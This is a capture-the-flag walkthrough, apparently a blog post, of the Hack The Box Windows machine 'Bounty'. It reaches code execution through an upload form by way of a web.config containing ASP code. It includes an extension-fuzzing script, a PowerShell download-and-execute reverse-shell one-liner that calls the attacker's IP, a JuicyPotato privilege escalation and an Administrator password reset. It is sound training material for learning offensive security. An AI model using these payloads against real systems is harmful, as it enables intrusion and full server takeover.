Bounty - Hack The Box
Synopsis
Bounty is an easy difficulty Windows machine, which features an interesting techniques to bypass file uploader
protections and achieve code execution
. Privileges escalation invloves abusing SeImpersonatePrivilege
. This machine is also vulnerable to multiple privilege escalation vulnerabilites. Which highlights the importance of keeping system upto date with latest security patches.
Skills Required
Basics of C# or VB.NET
Skills Learned
- web.config payload creation
- Identifying missing security patches
Enumeration
Nmap
As always we start with nmap.
# Nmap 7.80 scan initiated Sat Apr 18 02:47:28 2020 as: nmap -Pn -sC -sV -v -p80 -oN full.nmap bounty.htb
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We only see port 80
open and its running IIS 7.5
. Little googling about the IIS version
. we know that it is Built-in component of Windows 7 and Windows Server 2008 R2
.
IIS
Navigate to the page on port 80
we’re presetend a page with image.
Since main page doesn’t take us to anywhere. we’ll perform gobuster
to find for the hidden directories or files. Since this is running IIS
i’l append asp,aspx
extenstions to gobuster
.
gobuster dir -u http://10.10.10.93/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x asp,aspx -o dir.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93/
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: asp,aspx
[+] Timeout: 10s
===============================================================
2020/04/19 11:11:58 Starting gobuster
===============================================================
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)
We found two directories and an transfer.aspx
file. let’s look at them.
Navigating to /transfer.aspx
its gives some file upload page.
At First go i’ve tried uploading an image and it wokred and relating it /uploadedfiles
directory . we’re able to access uploaded
files at /uploadefiles
endpoint. which is good.
So, looking at this behaviour i’ve tried uploading a aspx
file. but It’s throwing me an error and unable to upload It. I’ve tried bypassing extension with %00
null byte in the post request. but i’m unable to access the uploade aspx
file at /uploadedfiles
.
So, we’ll Fuzz
the upload functionality and check what kinda extensions
it accepts. So, i’ve create a extesnions.list
with common extensions in it.
cat extensions.list
asp
aspx
php
php5
php7
phtml
pl
exe
config
gif
png
jpg
To automate this process of extension checking on the File
upload i’ve written a python script. This to work properly we need value of __VIEWSTATE
and __EVENTVALIDATION
which we can grab from the source of the File upload
page. The extensionCheck.py
python script looks like this.
import requests
import re
def FileUpload(filename):
url = "http://10.10.10.93/transfer.aspx"
burp = {'http' : 'http://127.0.0.1:8080'}
session = requests.session()
request = session.get(url)
ViewState = re.findall(r'__VIEWSTATE" value="(.*?)"', request.text)[0]
EventValidation = re.findall(r'__EVENTVALIDATION" value="(.*?)"',request.text)[0]
post_data = {
'__VIEWSTATE' : ViewState,
'__EVENTVALIDATION' : EventValidation,
'btnUpload' : 'upload'
}
uploaded_file = {'FileUpload1' : (filename, 'test file')}
request = session.post(url,files=uploaded_file, data=post_data, proxies=burp)
return request.text
print("Allowed Extensions:")
for extension in open('extensions.list','r'):
response = FileUpload('mah1ndra.' + extension[:-1])
if "Invalid File" not in response:
print(extension)
Running the python script gives us the allowed file extensions on the machine.
python3 extensionCheck.py
Allowed Extensions:
config
gif
png
jpg
web.config RCE
Looking at the allowed extension. config
seems to be interesting . quick googling for aspx config file upload rce
. I came across this awesome blog Upload a web.config File for Fun & Profit. Which tell in IIS 7.5
we can upload web.config
file with asp
code inside it and achieve RCE
.
This blog also gives us sample web.config
file.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
In the ASP comment
it is telling us after uploding this web.config
on the vunlerable IIS
Website and if it gives 3
as ouput. Then we it is confirmed that its running the ASP code
.
Uploading this web.config
file and looking at it on /uploadedfiles/web.config
gives us output 3
.
So, We confirmed that its running asp
code. now we’ll append a simple asp
code and execute ping
command and see if machine is doing a ping to our IP
.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.24")
o = cmd.StdOut.Readall()
Response.write(o)
%>
curl http://10.10.10.93/uploadedfiles/web.config
We’re getting ping's
fromt the bounty machine ip and we confirmed the code exection
. Now we use Nishangs
Powershell scripts to get a reverse shell
. we’ll insert the following commnand.
cmd /c powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.24/Invoke-PowerShellTcp.ps1')
Now, we got a shell as merlin
user.
Privilege Escalation
Doing system info
we’ll know this box is vulnerable to lots of privilege escalations .Since its a
Windowns Server 2008 R2 no
Hotfixes` installed.
PS C:\windows\system32\inetsrv> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 4/19/2020, 10:17:28 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,575 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,577 MB
Virtual Memory: In Use: 518 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
Also looking at privileges
of merlin
user we can see that SeImpersonatePrivilege
enabled. We can use JuciyPotato
to exploit this.
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Juicy potato
can make use of other COM
server and any port other than 6666
. we can download JuicyPotato.exe
from releases.
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
we’ll create a rev.bat
script which execute powershell Invoke TCP
and give us reverse shell.
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.24/Invoke-PowerShellTcp.ps1')"
Similary, we can create a script(pwned.bat) to change the Administrator
passowrd and login with PSEXEC
with those credentials
net user Administrator pwned
we need to transfer both rev.bat
and JuicyPotato.exe
on to the machine . Then we need valid CLSID
to exploit it. There a list of CLSID for Windows Server 2008 R2 and we can choose one which gives NT AUTHORITY\SYSTEM
.
Now we’ll run the binary with required arguments.
PS C:\temp> ./JuicyPotato.exe -t * -p c:\temp\rev.bat -l 9001 -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 9001
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
This give us reverse shell as NT AUTHORITY\SYSTEM
.
sudo rlwrap ncat -lvnp 443
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49174.
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
bounty
Thank you for taking your time for reading this blog!.